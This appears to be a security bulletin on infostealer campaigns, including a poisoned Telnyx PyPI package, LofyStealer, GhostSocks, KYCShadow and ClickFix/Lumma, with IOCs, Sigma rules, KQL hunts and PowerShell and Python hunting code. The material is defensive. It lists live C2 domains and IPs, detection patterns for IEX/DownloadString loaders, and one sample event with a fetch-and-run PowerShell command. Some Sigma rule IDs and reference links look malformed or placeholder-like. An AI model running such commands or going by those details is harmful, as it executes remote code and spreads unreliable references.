Recent OTX Pulse activity indicates a coordinated surge in credential theft operations utilizing diverse initial access vectors ranging from software supply chain compromises to sophisticated social engineering. The primary objective across these campaigns is the harvesting of banking credentials, browser session data, and authentication tokens for financial fraud and resale on dark web markets.
Notable activity includes TeamPCP weaponizing the popular Telnyx Python SDK via PyPI to deliver a stealthy credential harvester using steganography. Simultaneously, LofyStealer is actively targeting the gaming sector (Minecraft) with a Node.js loader, while GhostSocks leverages compromised devices as residential proxy infrastructure to facilitate subsequent malware delivery, often partnering with Lumma Stealer. Additionally, a ClickFix campaign is using fake browser error prompts to distribute HijackLoader and Lumma Stealer via obfuscated PowerShell, and KYCShadow continues to target Indian banking customers through WhatsApp-distributed Android trojans.
Threat Actor / Malware Profile
TeamPCP (Telnyx SDK Campaign)
- Distribution: Supply chain attack via malicious Python package (telnyx) on PyPI.
- Payload Behavior: Three-stage architecture involving a platform-specific loader and a second-stage payload hidden within a WAV file using steganography.
- C2: Encrypted exfiltration of harvested credentials to actor-controlled infrastructure.
- Persistence: Likely achieved via Python environment startup scripts or scheduled tasks triggered by the SDK installation.
LofyStealer (LofyGang)
- Distribution: Social engineering targeting Minecraft players.
- Payload Behavior: Large 53.5MB Node.js loader disguising a 1.4MB native C++ payload that executes directly in memory to evade disk-based scanning.
- Capabilities: Steals cookies, passwords, tokens, credit cards, and IBANs from eight distinct browsers.
- Anti-Analysis: Uses syscalls evasion and obfuscation within the Node.js loader.
GhostSocks (MaaS)
- Distribution: Malware-as-a-Service marketed on Russian underground forums.
- Payload Behavior: GoLang binary converting devices into SOCKS5 residential proxy nodes. Frequently bundles Lumma Stealer.
- C2: Uses TLS encryption to blend malicious traffic with legitimate web traffic.
- Capabilities: Evasion via residential proxying, enabling attackers to bypass geo-blocks and IP-based detection.
KYCShadow
- Distribution: WhatsApp messages masquerading as legitimate bank KYC verification apps.
- Payload Behavior: Multi-stage dropper using native code obfuscation and Firebase for remote execution.
- Capabilities: OTP theft, SMS interception, VPN manipulation to route traffic through attacker-controlled nodes, and WebView phishing overlays.
ClickFix / Lumma Stealer
- Distribution: Fake browser error prompts (ClickFix) tricking users into running PowerShell commands.
- Payload Behavior: Obfuscated PowerShell downloads a malicious MSI, utilizing HijackLoader and DLL sideloading.
- Techniques: Process injection, living-off-the-land binaries (LOLBins) for defense evasion.
IOC Analysis
The provided IOCs present a mix of network infrastructure and payload artifacts essential for detection:
- Domains & Hostnames: Includes infrastructure for C2 and phishing (e.g., serv.biz, retreaw.click, aquasecurtiy.org). SOC teams should immediately block these at the perimeter and DNS layer. Note the typo-squatting potential in aquasecurtiy.org.
- File Hashes: Multiple MD5, SHA1, and SHA256 hashes for loaders, payloads (LofyStealer, GhostSocks), and components of the KYCShadow malware. These should be imported into EDR alerting rules.
- IPs: Specific IPs including 24.152.36.241 (LofyStealer) and 85.11.161.198 (ClickFix) indicate active C2 nodes.
- URLs: Direct download links for malicious MSI files in the ClickFix campaign.
Operationalization: Utilize EDR solutions to query for the SHA256 hashes on disk. Configure network monitoring (Zeek/IDS) to alert on TLS connections to the listed domains.
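As an added illustration of the operationalization step (this is not code from the pulse), the following Python matcher checks constructed log lines against the domains, IPs and hashes quoted above; it matches domains on label boundaries rather than by substring, and infers MD5/SHA1/SHA256 from digest length so one mixed indicator list can be used:

```python
import re
# Added example for the IOC section above, not code from the pulse. Indicator
# values are the ones quoted in the text; the log lines are constructed.
IOC_DOMAINS = {"serv.biz", "retreaw.click", "aquasecurtiy.org"}
IOC_IPS = {"24.152.36.241", "85.11.161.198"}
IOC_HASHES = {  # one list mixing the three digest types, as in the hunt script below
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",  # SHA256
    "3fcc7360a2738ad2656e17c7d4ed3e651ff7d73a",                          # SHA1
    "d21a5d08b4614005c8fcd9d0068f0190",                                  # MD5
}
HASH_ALGO = {32: "md5", 40: "sha1", 64: "sha256"}  # hex length -> algorithm

def domain_matches(host):
    """Exact or subdomain match on label boundaries: a plain substring test on
    'serv.biz' would also fire on unrelated names such as observ.biz."""
    h = host.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if h == ioc or h.endswith("." + ioc):
            return ioc
    return None

def hash_matches(digest):
    """Return the algorithm name when the digest is a known indicator, else None."""
    d = digest.lower()
    return HASH_ALGO.get(len(d)) if d in IOC_HASHES else None

KV = re.compile(r"(\w+)=(\S+)")  # simple key=value log format (constructed)
CHECKS = {"dst_host": domain_matches, "hash": hash_matches,
          "dst_ip": lambda a: a if a in IOC_IPS else None}

def scan_log(lines):
    """Walk key=value log lines and return (line_no, field, indicator) hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        for key, val in KV.findall(line):
            hit = CHECKS[key](val) if key in CHECKS else None
            if hit:
                hits.append((n, key, hit))
    return hits

# Constructed sample lines (not real telemetry)
SAMPLE = [
    "ts=1 host=ws01 dst_host=cdn.serv.biz dst_ip=198.51.100.7",
    "ts=2 host=ws01 dst_host=observ.biz dst_ip=198.51.100.8",      # must not fire
    "ts=3 host=ws02 dst_host=updates.example.com dst_ip=85.11.161.198",
    "ts=4 host=ws03 file=a.exe hash=D21A5D08B4614005C8FCD9D0068F0190",  # MD5, upper case
]
```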
Detection Engineering
Sigma Rules
title: Suspicious PowerShell Command Line with MSI Download
id: 6a8b3c2d-1e4f-4b5a-9c6d-7e8f9a0b1c2d
description: Detects PowerShell commands downloading .msi files, a technique observed in ClickFix campaigns distributing Lumma Stealer.
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6523456789abcdef
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_pwsh:
        Image|endswith: '\powershell.exe'
    selection_cli:
        CommandLine|contains: '.msi'
    selection_obfuscation:
        # list of maps = OR; IEX is anchored on word boundaries so that ordinary
        # msiexec.exe command lines (which contain the substring "iex") do not match
        - CommandLine|contains:
            - 'Invoke-Expression'
            - 'DownloadString'
        - CommandLine|re: '(?i)\bIEX\b'
    condition: selection_pwsh and selection_cli and selection_obfuscation
falsepositives:
    - Legitimate software installation scripts
level: high
---
title: Node.js Spawning Native Windows Processes
id: 7b9c4d3e-2f5g-5h6i-0d7e-8f9a0b1c2d3e
description: Detects Node.js processes spawning suspicious native processes (e.g., cmd, powershell) indicative of LofyStealer loader activity.
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6523456789abcdg
tags:
    - attack.defense_evasion
    - attack.t1202
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\node.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\rundll32.exe'
    filter_legit:
        CommandLine|contains: 'npm'
    condition: selection_parent and selection_child and not filter_legit
falsepositives:
    - Legitimate development tools running build scripts
level: medium
---
title: Network Connection to Infostealer C2 Domains
id: 8c0d5e4f-3h6i-6j7k-1e8f-9a0b1c2d3e4f
description: Detects network connections to domains associated with GhostSocks, KYCShadow, and TeamPCP campaigns.
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6523456789abcdh
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: windows
    category: network_connection
detection:
    selection:
        DestinationHostname|contains:
            - 'serv.biz'
            - 'serv.xyz'
            - 'api.biz'
            - 'retreaw.click'
            - 'aquasecurtiy.org'
    condition: selection
falsepositives:
    - Rare, but verify if similar legitimate domains exist in org environment
level: critical
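To check the two process-creation rules before deploying them, here is an added Python evaluator (not part of the pulse) that applies their selection and filter logic to constructed events; it matches IEX on word boundaries so that msiexec.exe command lines, which contain "iex" as a substring, do not fire:

```python
import re
# Added example, not from the pulse: applies the two process-creation rules
# above to constructed events. Sigma string modifiers are case-insensitive, so
# values are lower-cased; 'IEX' is matched on word boundaries because a plain
# substring test would also fire on every msiexec.exe command line.
def ends_with_any(value, suffixes):
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)

def contains_any(value, needles):
    v = value.lower()
    return any(n.lower() in v for n in needles)

def clickfix_msi_rule(ev):
    """Suspicious PowerShell Command Line with MSI Download (selections AND-ed)."""
    cli = ev.get("CommandLine", "")
    obfuscation = (contains_any(cli, ["Invoke-Expression", "DownloadString"])
                   or re.search(r"\biex\b", cli, re.IGNORECASE) is not None)
    return (ends_with_any(ev.get("Image", ""), ["\\powershell.exe"])
            and contains_any(cli, [".msi"]) and obfuscation)

def node_spawn_rule(ev):
    """Node.js Spawning Native Windows Processes (parent and child, minus the npm filter)."""
    return (ends_with_any(ev.get("ParentImage", ""), ["\\node.exe"])
            and ends_with_any(ev.get("Image", ""), ["\\powershell.exe", "\\cmd.exe", "\\rundll32.exe"])
            and not contains_any(ev.get("CommandLine", ""), ["npm"]))

RULES = {"clickfix_msi": clickfix_msi_rule, "node_spawn": node_spawn_rule}

def evaluate(events):
    """Map event index -> names of the rules that fired, for events with a hit."""
    hits = {}
    for i, ev in enumerate(events):
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[i] = fired
    return hits

# Constructed process-creation events (not real telemetry; the URL is a placeholder)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",  # ClickFix pattern: fires
     "CommandLine": "powershell -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/x.msi'))\""},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",  # msiexec install, no IEX: silent
     "CommandLine": "powershell -c Start-Process msiexec.exe -ArgumentList '/i setup.msi /qn'"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": 'cmd.exe /d /s /c "npm run build"'},  # excluded by filter_legit
    {"Image": PS, "ParentImage": r"C:\Users\dev\AppData\Local\Temp\launcher\node.exe",
     "CommandLine": "powershell -nop -w hidden -enc AAAA"},  # node.exe -> powershell: fires
]
```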
KQL (Microsoft Sentinel)
// Hunt for Infostealer C2 Communications and Process Patterns
// Kusto accepts one tabular expression per query, so run each of the three hunts
// below as its own query; the let statements it needs are placed in front of it.
// Hunt 1: Network Connections to C2
let IOCs_Domains = dynamic(['retreaw.click', 'serv.biz', 'serv.xyz', 'api.biz', 'aquasecurtiy.org']);
let IOCs_IPs = dynamic(['24.152.36.241', '85.11.161.198']);
DeviceNetworkEvents
| where RemoteUrl in~ IOCs_Domains or RemoteIP in~ IOCs_IPs
| project TimeGenerated, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
// Hunt 2: File Creation for Known Malware Hashes (SHA256 values only)
let IOCs_Hashes = dynamic(['6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a', '293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881', 'd2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb']);
DeviceFileEvents
| where SHA256 in~ IOCs_Hashes
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
// Hunt 3: Suspicious PowerShell Execution (ClickFix)
// 'has' matches IEX as a whole term; 'contains' would also match every msiexec.exe command line
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName =~ 'PowerShell.EXE'
| where ProcessCommandLine contains '.msi' and (ProcessCommandLine has 'IEX' or ProcessCommandLine contains 'DownloadString')
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
PowerShell Hunt Script
# IOC Hunt Script for TeamPCP, LofyStealer, and KYCShadow Hashes
# The list mixes SHA256 (64 hex chars), SHA1 (40) and MD5 (32) values, so each
# file is hashed with every algorithm present in the list; hashing with SHA256
# alone would never match the MD5 and SHA1 indicators.
$MaliciousHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "97e073abd819d9cdc07705aeaa481f59",
    "3fcc7360a2738ad2656e17c7d4ed3e651ff7d73a",
    "d21a5d08b4614005c8fcd9d0068f0190",
    "fb203c0ac030a97281960d7c28d86ebf",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "ddd2994acd25bde5ac32a03f1cf30b41",
    "3da35272ad6d280d3388d57bdbf61b9c"
)
# Group the indicators by algorithm, inferred from the hex length
$HashAlgorithms = @{ 32 = "MD5"; 40 = "SHA1"; 64 = "SHA256" }
$HashesByAlgo = @{}
foreach ($Hash in $MaliciousHashes) {
    $Algo = $HashAlgorithms[$Hash.Length]
    if (-not $Algo) { Write-Warning "Unrecognised hash length, skipping: $Hash"; continue }
    if (-not $HashesByAlgo.ContainsKey($Algo)) { $HashesByAlgo[$Algo] = @() }
    $HashesByAlgo[$Algo] += $Hash.ToUpper()
}
$SearchPaths = @("C:\Windows\Temp", "C:\Users\", $env:TEMP)
Write-Host "[+] Scanning for known malicious file hashes..." -ForegroundColor Cyan
foreach ($Path in $SearchPaths) {
    if (-not (Test-Path $Path)) { continue }
    # -File skips directories, which Get-FileHash cannot hash
    Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $File = $_
        foreach ($Algo in $HashesByAlgo.Keys) {
            $FileHash = (Get-FileHash -Path $File.FullName -Algorithm $Algo -ErrorAction SilentlyContinue).Hash
            if ($FileHash -and $HashesByAlgo[$Algo] -contains $FileHash) {
                Write-Host "[!] MALICIOUS FILE FOUND ($Algo): $($File.FullName)" -ForegroundColor Red
            }
        }
    }
}
Write-Host "[+] Scan complete." -ForegroundColor Green
Response Priorities
- Immediate:
  - Block all listed IOCs (Domains, IPs, URLs) at perimeter firewalls, proxies, and endpoint security agents.
  - Initiate hunts for the specific file hashes provided across all endpoints using EDR capabilities.
  - Isolate any endpoints showing signs of the TeamPCP steganography loader (suspicious WAV file executions) or Node.js spawning suspicious processes.
- 24 Hours:
  - Conduct credential audits for users who may have interacted with the "ClickFix" pages or downloaded the compromised Telnyx SDK.
  - Verify the integrity of Python environments used by development teams to ensure no compromise via the telnyx package.
  - Mobile Security teams should scan for the presence of the KYCShadow APK on managed devices.
- 1 Week:
  - Implement strict package verification (PyPI lockfiles, checksums) for software supply chains.
  - Harden browser policies to restrict unauthorized extensions and script execution.
  - Review and restrict PowerShell execution policies, and enable script block logging to detect obfuscated commands similar to the ClickFix campaign.